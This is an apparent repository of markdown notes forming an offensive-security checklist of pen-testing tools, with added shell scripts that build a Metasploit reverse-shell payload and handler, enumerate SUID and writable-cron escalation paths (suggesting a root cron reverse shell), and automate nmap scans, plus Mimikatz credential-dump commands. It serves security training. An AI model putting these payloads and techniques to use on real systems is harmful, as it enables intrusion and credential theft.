├── Reverse Engineering & Debugging.md
├── Exploitation.md
├── Post-Exploitation.md
├── Recon.md
├── Offensive Security Checklist.md
└── README.md

/Reverse Engineering & Debugging.md:
--------------------------------------------------------------------------------
---
tags #debugging #reverseengineering #RE #assembly #binary
---

**GDB (GNU Debugger):**

```
command: gdb -q ./binary
---
description: command-line debugger for native code (C, C++, Rust, Go and other compiled languages). Used to set breakpoints, step through execution, inspect registers and memory, and analyse crashes while developing or verifying an exploit. Plugins such as GEF or pwndbg add exploit-oriented views (heap layout, stack, ROP gadgets).
```

**IDA Pro:**

```
command: ida64
---
description: interactive disassembler (with the optional Hex-Rays decompiler) and debugger used for static reverse engineering of binaries; ida64 is the 64-bit build. Especially useful for understanding a vulnerable function in detail before writing an exploit.
```

**WinDbg:**

```
command: windbg
---
description: Microsoft's debugger for Windows user-mode and kernel-mode code. Used for analysing crash dumps, debugging drivers, and reverse engineering Windows software; its kernel debugger is the standard tool for Windows driver exploitation work.
```

**Wireshark:**

```
command: wireshark
---
description: graphical network protocol analyser (tshark is the CLI equivalent) that captures and dissects traffic. Useful for understanding an undocumented protocol before fuzzing or exploiting it, for spotting cleartext credentials, and for examining network-based attacks.
```

--------------------------------------------------------------------------------
/Exploitation.md:
--------------------------------------------------------------------------------
---
tags #exploits #malware #RCE #RevShell #CVE
---

**Metasploit Framework:**

```
command: msfconsole
---
description: exploitation framework that provides a wide range of exploits, payloads and auxiliary modules. Modules are easy to browse (search, info) and configure (show options, set) from the console, and msfvenom builds standalone payloads for the same handlers.
```
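A worked example, added here and not part of the checklist or of Metasploit itself: a small POSIX shell script that writes the msfvenom command and the matching `exploit/multi/handler` resource script from a single set of parameters. A handler whose payload type, LHOST or LPORT differ from what the executable was built with will accept the connection but never yield a usable session, and that mismatch is the most common reason an otherwise working exploit produces nothing. The address 10.10.14.5, port 4444 and the file names are made-up values for illustration.

```shell
#!/bin/sh
# Added example (not the checklist's or Metasploit's own code): keep payload,
# LHOST and LPORT in one place so the msfvenom payload and the handler that
# catches it cannot drift apart.

# Return 0 if $1 is an integer in 1..65535, 1 otherwise.
valid_port() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Print a Metasploit resource script (.rc) that starts a backgrounded handler.
# ExitOnSession false keeps the handler listening for further call-backs;
# "exploit -j -z" runs it as a job without dropping into the first session.
handler_rc() {
    payload=$1; lhost=$2; lport=$3
    [ -n "$payload" ] && [ -n "$lhost" ] || { echo "payload and LHOST are required" >&2; return 1; }
    valid_port "$lport" || { echo "invalid LPORT: $lport" >&2; return 1; }
    printf '%s\n' \
        "use exploit/multi/handler" \
        "set PAYLOAD $payload" \
        "set LHOST $lhost" \
        "set LPORT $lport" \
        "set ExitOnSession false" \
        "exploit -j -z"
}

# Print the msfvenom command that builds the executable for the same handler.
venom_cmd() {
    payload=$1; lhost=$2; lport=$3; out=$4
    printf 'msfvenom -p %s LHOST=%s LPORT=%s -f exe -o %s\n' \
        "$payload" "$lhost" "$lport" "$out"
}

# Only touches msfvenom/msfconsole when invoked as: ./script --run <LHOST> [LPORT]
# Example values (10.10.14.5, 4444, payload.exe) are illustrative.
if [ "${1:-}" = "--run" ]; then
    PAYLOAD=windows/x64/meterpreter/reverse_tcp
    LHOST=${2:?usage: $0 --run <LHOST> [LPORT]}
    LPORT=${3:-4444}
    handler_rc "$PAYLOAD" "$LHOST" "$LPORT" > handler.rc
    echo "[*] $(venom_cmd "$PAYLOAD" "$LHOST" "$LPORT" payload.exe)"
    msfvenom -p "$PAYLOAD" LHOST="$LHOST" LPORT="$LPORT" -f exe -o payload.exe
    msfconsole -q -r handler.rc
fi
```

The generated resource script is loaded with `msfconsole -q -r handler.rc`; because the payload string is the same variable in both commands, switching to a stageless or 32-bit payload is a one-line change that updates both sides.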
**BurpSuite:**

```
command: burpsuite
---
description: intercepting web proxy. Route browser traffic through it, intercept and modify requests, and analyse responses for vulnerabilities; Repeater replays a single request with edits and Intruder fuzzes chosen positions in it.
```

**SQLMap:**

```
command: sqlmap -u "<url>" --dbs
---
description: automated detection and exploitation of SQL injection in web apps. -u takes the target URL including the injectable parameter; -r takes a saved raw HTTP request instead, which is the easiest way to test a POST body, header or cookie captured in Burp; --dbs enumerates the databases once an injection is confirmed.
```

**[ExploitDB](https://www.exploit-db.com)**

```
Online archive of public exploits and proof-of-concept code, searchable by product, version and CVE (searchsploit is the offline copy of the same index on Kali). Read any exploit before running it: most need the target, offsets or credentials adjusted, and some are deliberately broken.
```

**[CVE Database](https://cve.mitre.org/)**

```
The CVE list catalogues publicly disclosed vulnerabilities under a unique identifier (CVE-YYYY-NNNNN) with a short description and references. Unlike ExploitDB it does not host exploit code: use it to match a finding to a specific product version, then look in ExploitDB or vendor advisories for the corresponding exploit or patch.
```

**OWASP ZAP**

```
command: zap.sh
---
description: open-source web application security scanner and intercepting proxy. Passive scanning flags issues in proxied traffic without sending extra requests; active scanning sends attack payloads and should only be run against targets you are authorised to test.
```

--------------------------------------------------------------------------------
/Post-Exploitation.md:
--------------------------------------------------------------------------------
---
tags #post-exploitation #persistence #privilege-escalation #lateral-movement
---

**Mimikatz**:

```
command: mimikatz.exe
---
description: post-exploitation tool for Windows credential theft. Dumps passwords and hashes from LSASS (privilege::debug, then sekurlsa::logonpasswords), performs pass-the-hash and pass-the-ticket, and exports Kerberos tickets. Requires local administrator or SYSTEM, and the stock binary is flagged by most AV/EDR products.
```

**LinPeas:**

```
command: ./linpeas.sh
---
description: a post-exploitation enumeration script for Linux that automates privilege escalation checks.
```
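An added example, hand-written for this page rather than taken from LinPEAS, showing three of the checks LinPEAS automates so the logic behind its output is visible: SUID/SGID binaries, world-writable cron files, and world-writable directories on PATH. Each function takes a root directory so it can be pointed at `/` on a target or at a scratch tree; `--run` scans the live system. The paths named in the comments are illustrative.

```shell
#!/bin/sh
# Added example (not LinPEAS code): three privilege-escalation checks, each a
# function taking a root directory so it works on / or on a test fixture.

# 1. SUID/SGID binaries. These run with their owner's (or group's) privileges.
#    Compare the list with a stock install and look the extras up on GTFOBins
#    to see whether they can be abused for a root shell.
find_suid() {
    root=${1:-/}
    find "$root" -xdev \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null | sort
}

# 2. World-writable cron files. A root cron job that runs a script anyone can
#    edit is a direct escalation path: append "chmod u+s /bin/bash" (or a
#    reverse shell) and wait for the next run.
find_writable_cron() {
    root=${1:-/}
    find "$root/etc/crontab" "$root/etc/cron.d" "$root/etc/cron.hourly" \
         "$root/etc/cron.daily" -type f -perm -0002 2>/dev/null | sort
}

# 3. World-writable directories on PATH. If root (via cron or sudo) runs a
#    command by bare name and one of these directories is searched before the
#    real location, a same-named file dropped there runs as root. Sticky
#    directories still allow creating new files, so they are reported too.
#    Takes a PATH-style string; defaults to the current $PATH.
writable_path_dirs() {
    path=${1:-$PATH}
    old_ifs=$IFS
    IFS=:
    for d in $path; do
        [ -d "$d" ] || continue
        # In the ls -ld mode string, character 9 is the "other" write bit.
        case $(ls -ld "$d") in
            d???????w*) echo "$d" ;;
        esac
    done
    IFS=$old_ifs
}

# Live scan of the current host: ./script --run
if [ "${1:-}" = "--run" ]; then
    echo "[*] SUID/SGID binaries:";         find_suid /
    echo "[*] World-writable cron files:";  find_writable_cron /
    echo "[*] World-writable PATH dirs:";   writable_path_dirs "$PATH"
fi
```

LinPEAS runs dozens of further checks (kernel version, sudo rules, capabilities, credentials in files, container escapes), but these three cover a large share of the easy wins on CTF and real targets alike, and they are quick to run by hand when dropping a 900 KB script onto a monitored host is not an option.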
LinPEAS scans the target for misconfigurations, known vulnerabilities and likely privilege escalation paths (SUID binaries, writable cron jobs, sudo rules, credentials left in files), colour-coding the most promising findings; the same output is also useful for planning lateral movement once the host is fully compromised.

**pspy:**

```
command: ./pspy
---
description: a lightweight, unprivileged process snooping tool for Unix-like systems. It polls /proc (triggered by inotify filesystem events) to log commands as they start, without requiring root, so it catches cron jobs and other scheduled or triggered commands run by root that are not obvious from their configuration files. It cannot see other users' processes when /proc is mounted with hidepid=2.
```

**MetaSploit Meterpreter:**

```
command: msfconsole -> use exploit/multi/handler -> set payload windows/meterpreter/reverse_tcp -> set LHOST <your ip> -> set LPORT <port> -> exploit
---
description: in-memory post-exploitation payload provided by the Metasploit Framework. Once a session is established it supports file system access, process migration, privilege escalation (getsystem), credential dumping (hashdump, the kiwi extension) and pivoting (route, portfwd) to reach other hosts for lateral movement. The handler's payload, LHOST and LPORT must match what the delivered payload was built with, or the connection will arrive without a working session.
```

--------------------------------------------------------------------------------
/Recon.md:
--------------------------------------------------------------------------------
---
tags #Recon #networkexploration #cybersecurity #osint
---

Recon is the first stage of a vulnerability analysis and [[exploitation]] routine in Offensive Security.

This stage involves both Active and Passive recon: active recon sends traffic to the target (port and vulnerability scans) and can be detected by it, while passive recon draws on third-party sources (search engines, DNS, Shodan) and leaves no trace on the target.

### Active Recon

**NMAP**:

```
command: nmap -p 1-65535 -sV -sC <target>
---
description: network scanning tool. Discovers open ports, identifies the services and versions behind them (-sV) and runs the default NSE scripts (-sC) for extra detail. -p 1-65535 (or -p-) covers every TCP port rather than the default top 1000; add -sU for UDP and -oA <prefix> to save results in all three output formats.
```

**Nessus:**

```
command: nessuscli (scans are created and launched from the web UI at https://localhost:8834)
---
description: commercial vulnerability scanner. nessuscli handles installation tasks such as activation and plugin updates; scans built from templates such as "Basic Network Scan" are configured in the web UI or through the REST API, and the results come as detailed, severity-rated reports with remediation guidance.
```
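Added example for the Nmap entry above (not code from the checklist): a two-phase scan. Running `-sV -sC` across all 65535 ports is slow because version probes and scripts fire against every port, so sweep all ports quickly first and then probe only the open ones; the result is the same information in a fraction of the time. The grepable sample output embedded in the script is constructed for the self-test and the address 10.10.10.5 is made up.

```shell
#!/bin/sh
# Added example (not from the checklist): two-phase Nmap scan.
# Phase 1: fast full-port sweep with grepable output (-oG -).
# Phase 2: -sV -sC only on the ports that phase 1 found open.

# Extract open TCP ports from Nmap grepable output on stdin as "22,80,443".
# The relevant field looks like:
#   Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 8080/filtered/tcp//...
open_ports_from_grepable() {
    grep 'Ports:' | sed 's/.*Ports: //' | tr ',' '\n' \
      | sed 's/^ *//' | grep '/open/tcp/' | cut -d/ -f1 \
      | sort -n | uniq | paste -s -d ',' -
}

# Print the phase-2 command for a target and a comma-separated port list.
# -oA writes normal, grepable and XML output under the given prefix.
phase2_cmd() {
    target=$1; ports=$2
    printf 'nmap -sV -sC -p %s -oA scan-%s %s\n' "$ports" "$target" "$target"
}

# Constructed sample of phase-1 output (invented host 10.10.10.5), used by the
# self-test; real output from "nmap -oG -" has the same fields.
SAMPLE_GREPABLE='# Nmap 7.94 scan initiated as: nmap -p- --min-rate 1000 -oG - 10.10.10.5
Host: 10.10.10.5 ()  Status: Up
Host: 10.10.10.5 ()  Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/open/tcp//https///, 8080/filtered/tcp//http-proxy///, 3306/closed/tcp//mysql///  Ignored State: closed (65530)
# Nmap done -- 1 IP address (1 host up) scanned'

# Live scan: ./script --run <target>
if [ "${1:-}" = "--run" ]; then
    target=${2:?usage: $0 --run <target>}
    # -p- is every TCP port; --min-rate speeds the sweep (lower it on lossy
    # links or ports get missed); -oG - streams grepable output to stdout.
    # A SYN scan needs root; without it Nmap falls back to a connect scan.
    ports=$(nmap -p- --min-rate 1000 -oG - "$target" | open_ports_from_grepable)
    if [ -z "$ports" ]; then
        echo "no open TCP ports found on $target" >&2
        exit 1
    fi
    echo "[*] open ports: $ports; running version and script scan"
    nmap -sV -sC -p "$ports" -oA "scan-$target" "$target"
fi
```

The parser deliberately keeps only `/open/tcp/` entries, so filtered and closed ports never reach the slow phase; if phase 1 reports nothing open, rerun it with a lower `--min-rate` or add `-Pn` before concluding the host is quiet.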
**Nikto:**

```
command: nikto -h <target>
---
description: automated web server scanner. Checks a host for dangerous files and CGIs, outdated server software and insecure configuration, and reports matching known issues with references to public advisories where available. It makes thousands of requests and is easily spotted, so it is strictly an active technique.
```

**BurpSuite:**

```
command: burpsuite
---
description: set up the web proxy and browse the target through it; the proxy history and Target site map then give an inventory of endpoints, parameters and technologies to test for vulnerabilities.
```

### Passive Recon

**Maltego**:

```
command: maltego
---
description: OSINT tool to gather and visualise information on a target. Reveals relationships between entities such as domain names, IP addresses, email addresses and social media profiles.
```

**theHarvester:**

```
command: theHarvester -d <domain> -b google
---
description: gathers email addresses, subdomains, hostnames and related information for the target domain from public sources (-b selects the source; -b all queries every configured one).
```

**[Shodan](https://www.shodan.io)**

```
Search engine for Internet-connected devices. Search for specific products, services, banners or vulnerabilities without touching the target yourself. Use case: find a target's exposed devices, identify open ports and gather information on each device from Shodan's existing scan data.
```

**Recon-ng:**

```
command: recon-ng
---
description: CLI-based framework with a Metasploit-like workflow for gathering information about domains, IPs, email addresses and more, with modules that query many OSINT sources and store results in a local database.
```

--------------------------------------------------------------------------------
/Offensive Security Checklist.md:
--------------------------------------------------------------------------------
---
tags #cybersecurity #hacking #offensivesecurity #ofsec #exploits #vulnerabilities
---

Offensive Security Checklist is a comprehensive guide for individuals interested in cybersecurity and hacking. It covers the categories that are crucial for offensive security professionals.

Here is a summary of each category:

> [!multi-column]
>
>> [!note]+ Recon
>> This category focuses on the initial phase of an offensive security operation: gathering information about the target. It includes techniques such as open-source intelligence (OSINT), network scanning, and vulnerability scanning.
>
>> [!warning]+ Exploitation
>> In this category you will find techniques and methodologies for exploiting vulnerabilities in target systems. It covers topics like exploit development, social engineering, and web application security testing.
>
>> [!summary]+ Post-Exploitation
>> Once a system has been compromised, this category provides guidance on what to do next. It includes topics such as privilege escalation, lateral movement, maintaining access, and data exfiltration.
>
>> [!summary|center-align]+ Reverse Engineering & Debugging
>> This category focuses on the analysis of software and systems to understand their inner workings. It covers topics like reverse engineering binaries, debugging techniques, and malware analysis.

By following this checklist you should have a structured approach to offensive security, ensuring that you cover all the necessary aspects of a successful operation.

Checklist Categories:

> [!multi-column|center-fixed]
>
>> [!blank|center]
>> [![lightbulb icon|80](https://img.icons8.com/?size=512&id=184&format=png&color=FFFFFF&opacity=0) Recon](Recon)
>>
>> [![macbook icon|80](https://img.icons8.com/ios/500/FFFFFF/blue--screen-of-death.png) Exploitation](Exploitation)
>
>> [!blank|center]
>> [![brain icon|80](https://img.icons8.com/ios/250/FFFFFF/command-line.png) Post-Exploitation](Post-Exploitation)
>>
>> [![briefcase icon|80](https://img.icons8.com/ios/250/FFFFFF/window-bug.png) Reverse Engineering & Debugging](Reverse%20Engineering%20&%20Debugging)

Check out the RSS feed for all the latest CVE updates at the minute!

Data extracted from [CVEDetails](https://www.cvedetails.com)

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# Offensive Security Checklist

![Cybersecurity](https://img.shields.io/badge/Cybersecurity-Checklist-blue)
![Hacking](https://img.shields.io/badge/Hacking-Checklist-red)
![Offensive Security](https://img.shields.io/badge/Offensive%20Security-Checklist-orange)

Welcome to the Offensive Security Checklist repository! This comprehensive guide is designed for individuals interested in cybersecurity and hacking. It covers the categories that are crucial for offensive security professionals.

## Summary

The Offensive Security Checklist covers the following categories:

### Recon

This category focuses on the initial phase of an offensive security operation: gathering information about the target. It includes techniques such as open-source intelligence (OSINT), network scanning, and vulnerability scanning.

### Exploitation

In this category you will find techniques and methodologies for exploiting vulnerabilities in target systems. It covers topics like exploit development, social engineering, and web application security testing.

### Post-Exploitation

Once a system has been compromised, this category provides guidance on what to do next. It includes topics such as privilege escalation, lateral movement, maintaining access, and data exfiltration.

### Reverse Engineering & Debugging

This category focuses on the analysis of software and systems to understand their inner workings. It covers topics like reverse engineering binaries, debugging techniques, and malware analysis.
By following this checklist, you will have a structured approach to offensive security, ensuring that you cover all the necessary aspects of a successful operation.

In each of these categories, I provide widely used tools in Offensive Security practice and give key information and examples of how they can be used in a pen test environment.

## Checklist Categories

- [Recon](Recon.md)
- [Exploitation](Exploitation.md)
- [Post-Exploitation](Post-Exploitation.md)
- [Reverse Engineering & Debugging](Reverse%20Engineering%20&%20Debugging.md)

![0d553df4a58254742df71ddeb949f6b0](https://github.com/Stuub/Offensive-Security-Checklist/assets/60468836/8240c646-ee1f-43bc-b1d9-2a3ec94b9082)

Feel free to explore each category and dive into the detailed information provided.

Please take heed that the populated data is still in its early stages and there are developments yet to be added as time goes on. Feel more than welcome to contact me with any requests for additions!

## RSS Feed for CVE Updates

Stay up to date with the latest CVE (Common Vulnerabilities and Exposures) updates by checking out our RSS feed. It provides information on newly published vulnerabilities and helps you stay informed about potential risks.

Data extracted from [CVEDetails](https://www.cvedetails.com)

The current RSS feed shows new information daily! Could increase this further if people would prefer that :)

Feel free to contribute to this repository and make it even more comprehensive. Happy hacking!

---
--------------------------------------------------------------------------------